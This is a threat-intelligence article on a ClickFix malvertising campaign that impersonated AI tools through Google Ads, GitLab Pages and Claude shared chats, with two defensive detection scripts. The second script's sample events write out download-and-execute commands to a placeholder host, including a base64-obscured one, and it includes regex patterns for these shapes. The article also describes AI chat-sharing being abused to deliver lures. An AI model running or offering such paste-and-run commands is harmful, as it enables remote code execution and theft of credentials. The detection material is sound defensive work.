The cybersecurity landscape continues to evolve as threat actors adopt increasingly sophisticated techniques to exploit user trust. One of the most concerning developments observed in 2026 is a large-scale malvertising campaign that leveraged Google Ads to distribute ClickFix-style social engineering attacks by impersonating popular AI development platforms. The campaign targeted users actively searching for trusted AI tools such as ChatGPT Codex, Claude AI, Cursor IDE, Perplexity AI, and JetBrains products, demonstrating how cybercriminals are adapting their tactics to capitalize on the growing adoption of artificial intelligence technologies.
Unlike traditional malware campaigns that rely on malicious downloads or software vulnerabilities, this operation focused on manipulating technically skilled users into executing malicious commands themselves. By abusing trusted platforms including GitLab Pages and later Anthropic’s Claude shared chat functionality, attackers successfully created a convincing ecosystem of fraudulent resources that appeared legitimate even to security-conscious professionals. This campaign highlights the growing challenge organizations face as cybercriminals increasingly exploit trusted cloud services and AI-related branding to bypass conventional security controls.

Understanding the Evolution of the ClickFix Attack Technique
ClickFix attacks represent a relatively modern social engineering methodology that differs significantly from traditional phishing campaigns. Instead of delivering malware through direct downloads, attackers present users with what appears to be a troubleshooting guide, installation procedure, or technical fix. Victims are instructed to manually copy and execute terminal or PowerShell commands under the belief that they are installing software, resolving compatibility issues, or completing a legitimate setup process.
The effectiveness of this approach lies in the fact that the victim, not an exploit, performs the dangerous action. The download and execution happen inside a shell session the user opened on purpose, so controls that watch for files arriving through a browser or mail client never see a download: on macOS, for example, a file fetched with curl carries no com.apple.quarantine attribute, so Gatekeeper is never consulted before it runs. Endpoint protection that does observe the process tree sees an interactive Terminal session spawning a shell that runs curl, a sequence that is routine on a developer workstation. Users searching for AI development tools are often developers, engineers, and IT professionals who work in a terminal every day, which further lowers suspicion of a paste-this-command instruction and raises the odds of compromise.
Researchers observed that the attackers specifically targeted audiences interested in AI-powered development platforms: more than 82% of campaign traffic was associated with searches for AI coding assistants, development environments, and machine learning tools. This targeting shows a clear understanding of who searches for these terms and how threat actors refine victim selection to maximize infection rates.
Abuse of Google Ads and Trusted Infrastructure
A critical component of the campaign’s success was the abuse of Google Ads. By purchasing sponsored search placements, attackers ensured their malicious pages appeared at the top of the results for popular AI-related keywords. Users searching for software downloads often trust sponsored listings, assuming they have undergone some verification. The attackers deployed an extensive infrastructure consisting of 92 unique malicious hostnames hosted through GitLab Pages. GitLab Pages lets anyone publish a free static site under a subdomain of gitlab.io, so every such site inherits the reputation of a widely respected software development platform. Domain-age and domain-reputation checks key on the registered domain rather than on the project label in front of it, so they do not fire on these hostnames; the label itself is the only distinguishing signal.
The threat actors rapidly created and rotated dozens of subdomains designed to mimic legitimate software download portals. Examples included domains impersonating Claude Desktop, Claude Code, ChatGPT Codex, Cursor IDE, Perplexity AI, and JetBrains products. By continuously generating new domains, attackers maintained campaign effectiveness while avoiding detection and blacklisting efforts. This infrastructure strategy demonstrates a growing trend in cybercrime where adversaries prioritize trusted cloud services rather than hosting malicious content on obviously suspicious domains. Such tactics significantly increase the likelihood that users will perceive the content as legitimate.
Campaign Progression and Infrastructure Expansion
The operation evolved through six distinct phases between April and June 2026. During the initial wave, attackers primarily focused on Claude-related lures while simultaneously operating Mac utility scams targeting users searching for system optimization tools. The campaign generated substantial traffic, particularly in Taiwan, Japan, and Malaysia. As the operation matured, additional brands were incorporated into the attack strategy. New fraudulent pages imitated JetBrains products, Cursor IDE, Perplexity AI, and OpenAI’s ChatGPT Codex offerings. The introduction of multiple software brands indicates that attackers were actively testing keyword performance and measuring which product names generated the highest engagement rates.
By the third and fourth waves, infrastructure complexity increased dramatically. Numerous Claude-themed domains were deployed alongside ChatGPT and Codex impersonation sites. Traffic analysis suggested that Claude-related search terms consistently generated the highest engagement, leading attackers to prioritize those lures while continuing to diversify their portfolio of fraudulent brands. The campaign’s scalability demonstrates the effectiveness of automated infrastructure deployment and highlights how modern threat actors can rapidly adapt based on advertising performance metrics and victim engagement data.
The Shift from GitLab Pages to Claude AI Shared Chats
One of the most significant developments occurred during the fifth phase of the campaign, when attackers moved away from self-hosted GitLab Pages infrastructure and began abusing Claude AI’s legitimate shared-chat feature. Instead of directing victims to fake websites, the Google Ads began sending users directly to public Claude AI shared-conversation URLs. These pages were hosted entirely on the legitimate claude.ai domain and served under Anthropic’s own TLS certificate; nothing about the hostname, certificate, or hosting distinguished them from any other shared conversation. Only the content of the chat, and the fact that the visitor had arrived from a paid search result, set them apart.
This represented a major tactical advancement. Traditional security mechanisms often rely on detecting suspicious domains, newly registered websites, or poor domain reputations. When malicious content resides directly on a trusted platform such as Claude AI, those signals become ineffective, and blocking the platform domain is not an option for most organizations; detection has to move to the arrival path (the ad click) and to what the chat tells the user to do next. Researchers identified at least 45 unique malicious shared conversations during the early stages of this transition, a figure that grew to more than 61 unique shared-chat identifiers. Upon notification, Anthropic investigated the abuse, removed the malicious conversations, banned the responsible accounts, and implemented additional mitigation measures to reduce future misuse of the platform.
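The two hosting patterns described in this section and the previous one, a brand lookalike under *.gitlab.io and a claude.ai shared chat reached straight from an ad, can both be triaged from ordinary web-proxy logs. The script below is an added example written for this article; it is not the researchers' tooling and not GitLab or Anthropic code. It assumes a simplified "client_ip referer url" log format and that Google Ads auto-tagging appended its gclid parameter to the landing URL (the Google Ads default, but not something the article states). The hostnames, share identifiers, and log lines are constructed for the example and are not indicators from the campaign.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, urlparse

# Brand names the campaign impersonated, taken from the article's list of lures.
BRAND_TOKENS = ("claude", "codex", "chatgpt", "openai", "cursor", "perplexity", "jetbrains")

# Constructed sample log, one request per line: "client_ip referer url".
# Hostnames and share identifiers are made up for this example.
SAMPLE_LOG = """\
10.0.0.5 https://www.google.com/ https://claude-desktop-download.gitlab.io/?gclid=EAIaIQobChMI-example
10.0.0.5 https://claude-desktop-download.gitlab.io/ https://claude-desktop-download.gitlab.io/install.sh
10.0.0.7 https://www.google.com/ https://claude.ai/share/0f9c1b2a-1111-4222-8333-444455556666?gclid=Cj0KCQjw-example
10.0.0.9 https://docs.gitlab.com/ https://gitlab.com/example-group/example-project/-/issues/42
10.0.0.11 https://claude.ai/chat/7777 https://claude.ai/share/9a8b7c6d-aaaa-4bbb-8ccc-dddddeeeeeff
10.0.0.12 https://www.google.com/ https://www.jetbrains.com/idea/download/?gclid=EAIaIQobChMI-example
"""

_LINE_RE = re.compile(r"^(?P<ip>\S+)\s+(?P<ref>\S+)\s+(?P<url>\S+)\s*$")


def _host(url: str) -> str:
    return (urlparse(url).hostname or "").lower()


def classify(url: str, referer: str) -> Optional[str]:
    """Return a reason if the request matches one of the campaign's hosting patterns."""
    parsed = urlparse(url)
    host = (parsed.hostname or "").lower()
    # Google Ads auto-tagging appends gclid to the landing URL; organic results do not carry it.
    from_ad_click = "gclid" in parse_qs(parsed.query)
    from_search = _host(referer).startswith("www.google.")

    # Pattern 1: a brand name inside the free *.gitlab.io Pages label. The registered
    # domain is always gitlab.io, so the project label is the only distinguishing part.
    if host.endswith(".gitlab.io"):
        label = host[: -len(".gitlab.io")]
        hits = [t for t in BRAND_TOKENS if t in label]
        if hits:
            return f"brand lookalike on GitLab Pages ({', '.join(hits)})"

    # Pattern 2: a shared conversation on claude.ai reached from paid search. Sharing
    # is a normal feature, so the arrival path is the signal, not the share URL itself.
    if host == "claude.ai" and parsed.path.startswith("/share/"):
        if from_ad_click:
            return "claude.ai shared chat landed from a Google Ads click"
        if from_search:
            return "claude.ai shared chat reached from a search result (review)"

    return None


def triage(log_text: str) -> List[Tuple[str, str, str]]:
    """Apply classify() to each log line; returns (client_ip, url, reason) for hits."""
    findings = []
    for line in log_text.splitlines():
        m = _LINE_RE.match(line)
        if not m:
            continue  # skip blank or malformed lines
        reason = classify(m["url"], m["ref"])
        if reason:
            findings.append((m["ip"], m["url"], reason))
    return findings


if __name__ == "__main__":
    for ip, url, reason in triage(SAMPLE_LOG):
        print(f"{ip:<10} {reason}\n           {url}")
```

A gitlab.io hostname is flagged on its label alone, because the platform domain never changes and cannot be blocked. The shared-chat rule deliberately ignores chats reached from inside claude.ai or from a direct link, since sharing is a normal feature; only the paid-search arrival path is treated as suspicious, and an organic search hit, which carries no gclid, lands in the weaker "review" bucket rather than being ignored.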
Technical Analysis of the Attack Chain
The attack process was carefully designed to appear legitimate at every stage. Victims searching for AI software clicked sponsored advertisements that redirected them to trusted Claude AI shared chat pages. These chats impersonated support representatives, including fake Apple Support and software development teams. The fraudulent support conversations instructed users to open the macOS Terminal application and execute a command that appeared harmless. In reality, the command downloaded and executed a multi-stage malware loader.
Analysis revealed that the downloaded payload first performed environmental checks, including detecting whether Russian keyboard layouts or input methods were enabled. Systems associated with CIS-region users were excluded from infection, a behavior commonly observed among cybercriminal groups seeking to avoid attention from local law enforcement agencies. If the system passed these checks, the loader retrieved and executed the MacSync infostealer. This malware targeted highly sensitive information, including browser credentials, authentication cookies, SSH keys, and cryptocurrency wallet files. The stolen data was subsequently transmitted to attacker-controlled infrastructure for monetization and further exploitation.
The use of multiple stages, environmental awareness, and trusted platforms demonstrates a mature and well-resourced threat operation capable of adapting to modern defensive technologies.
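Because the initial foothold is a command the user pastes, the highest-value detection for the ClickFix technique described earlier and for the macOS chain in this section is the command line itself, with the parent process as context. The script below is an added example written for this article; it is not the researchers' or any vendor's detection logic. It assumes process-execution events in a constructed JSON-lines format whose field names are this example's own, and the sample commands are generic ClickFix shapes (a download piped into a shell, a base64-encoded argument, a command-substitution form), not the command used in the campaign; example.invalid is a reserved name that resolves nowhere.

```python
import base64
import json
import os
import re
from typing import Dict, List

# Constructed process-execution events (JSON lines). Field names are this example's
# own, not a vendor schema; the commands are generic ClickFix shapes, not campaign IOCs.
SAMPLE_EVENTS = """\
{"ts":"2026-05-02T09:14:03Z","user":"dev","parent":"/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal","exe":"/bin/zsh","cmdline":"curl -fsSL https://example.invalid/claude-desktop/setup.sh | bash"}
{"ts":"2026-05-02T09:14:09Z","user":"dev","parent":"/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal","exe":"/bin/zsh","cmdline":"echo Y3VybCAtZnNTTCBodHRwczovL2V4YW1wbGUuaW52YWxpZC9hIHwgc2g= | base64 -d | sh"}
{"ts":"2026-05-02T09:20:41Z","user":"dev","parent":"/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal","exe":"/bin/zsh","cmdline":"brew install node"}
{"ts":"2026-05-02T09:25:17Z","user":"dev","parent":"/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal","exe":"/bin/zsh","cmdline":"curl -fsSL https://example.invalid/tool.tar.gz -o tool.tar.gz"}
{"ts":"2026-05-02T10:02:55Z","user":"dev","parent":"/Applications/iTerm.app/Contents/MacOS/iTerm2","exe":"/bin/bash","cmdline":"bash -c \\"$(curl -fsSL https://example.invalid/install)\\""}
"""

# Interpreters that a fetched or decoded payload is typically piped into.
_INTERP = r"(?:(?:ba|z|da)?sh|python3?|perl|osascript)"

# Each pattern is one ClickFix command shape; dict order determines the order of reasons.
PATTERNS = {
    "download piped to interpreter":
        re.compile(rf"\b(?:curl|wget)\b[^|]*\|\s*(?:sudo\s+)?{_INTERP}\b"),
    "download substituted into shell":
        re.compile(rf"{_INTERP}\s+-c\s+[\"']?\$\(\s*(?:curl|wget)\b"),
    "base64 decode piped to interpreter":
        re.compile(rf"base64\s+(?:-d|-D|--decode)\b[^|]*\|\s*(?:sudo\s+)?{_INTERP}\b"),
}

# Candidate base64 blobs: long runs of the base64 alphabet with optional padding.
_B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")

# Process names of interactive terminal emulators (an assumed list for this example).
TERMINALS = {"Terminal", "iTerm2", "Alacritty", "kitty", "WezTerm"}


def _decoded_blobs(cmdline: str) -> List[str]:
    """Return printable-ASCII decodings of base64-looking tokens in the command line."""
    out = []
    for tok in _B64_TOKEN.findall(cmdline):
        try:
            text = base64.b64decode(tok, validate=True).decode("ascii")
        except ValueError:  # not valid base64, or not ASCII once decoded
            continue
        if all(c.isprintable() or c in "\n\t" for c in text):
            out.append(text)
    return out


def scan_cmdline(cmdline: str) -> List[str]:
    """Match the command line, and any base64-decoded argument, against PATTERNS."""
    reasons = [name for name, rx in PATTERNS.items() if rx.search(cmdline)]
    for text in _decoded_blobs(cmdline):
        reasons += [f"{name} (inside base64-decoded argument)"
                    for name, rx in PATTERNS.items() if rx.search(text)]
    return reasons


def analyze_events(jsonl: str) -> List[Dict]:
    """Return one finding per event whose command line matches a ClickFix shape."""
    findings = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        reasons = scan_cmdline(ev["cmdline"])
        if not reasons:
            continue
        findings.append({
            "ts": ev["ts"],
            "user": ev["user"],
            # A pasted ClickFix command has a terminal emulator as the shell's parent.
            "interactive": os.path.basename(ev["parent"]) in TERMINALS,
            "reasons": reasons,
            "cmdline": ev["cmdline"],
        })
    return findings


if __name__ == "__main__":
    for f in analyze_events(SAMPLE_EVENTS):
        origin = "interactive terminal" if f["interactive"] else "non-interactive parent"
        print(f"{f['ts']} {f['user']} [{origin}] {'; '.join(f['reasons'])}\n    {f['cmdline']}")
```

The base64 branch matters because the obvious shape, curl piped into bash, is often hidden behind an encoded argument; decoding the blob and re-scanning it recovers the same pattern. A plain download to disk (the fourth event) is not flagged, since that is what developers do all day. On real telemetry, the interactive flag is what separates a pasted ClickFix command from the same curl-pipe-bash line run by a provisioning script under launchd or a CI agent; tune those out by parent, not by weakening the patterns.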
Geographic Impact and Targeting Trends
Analysis of victim interactions revealed a strong concentration in the Asia-Pacific region, which accounted for approximately 67.4% of confirmed campaign activity. Taiwan emerged as the most heavily targeted location, followed by Japan and Singapore. As the campaign transitioned to Claude AI shared chat abuse, geographic targeting expanded considerably. Increased activity was observed in India, France, Italy, and Singapore, suggesting that attackers continuously optimized their advertising campaigns based on regional performance data and user engagement metrics. This geographic diversification indicates a highly organized operation utilizing advanced advertising analytics to maximize return on investment and identify regions with the highest likelihood of successful compromise.
Conclusion
The ClickFix malvertising campaign demonstrates a significant evolution in cybercriminal tactics. By combining Google Ads abuse, trusted cloud hosting services, AI software impersonation, and advanced social engineering, attackers successfully created a highly convincing ecosystem capable of deceiving even technically experienced users.
The campaign’s progression from GitLab Pages abuse to direct exploitation of Claude AI’s shared chat functionality represents a concerning shift toward the weaponization of trusted platforms. As threat actors continue refining these techniques, organizations must adopt a layered security approach that combines technical safeguards, user education, behavioral monitoring, and continuous threat intelligence. The incident serves as a clear warning that in the age of AI, trust itself has become one of the most valuable assets—and one of the most attractive targets for cybercriminals.
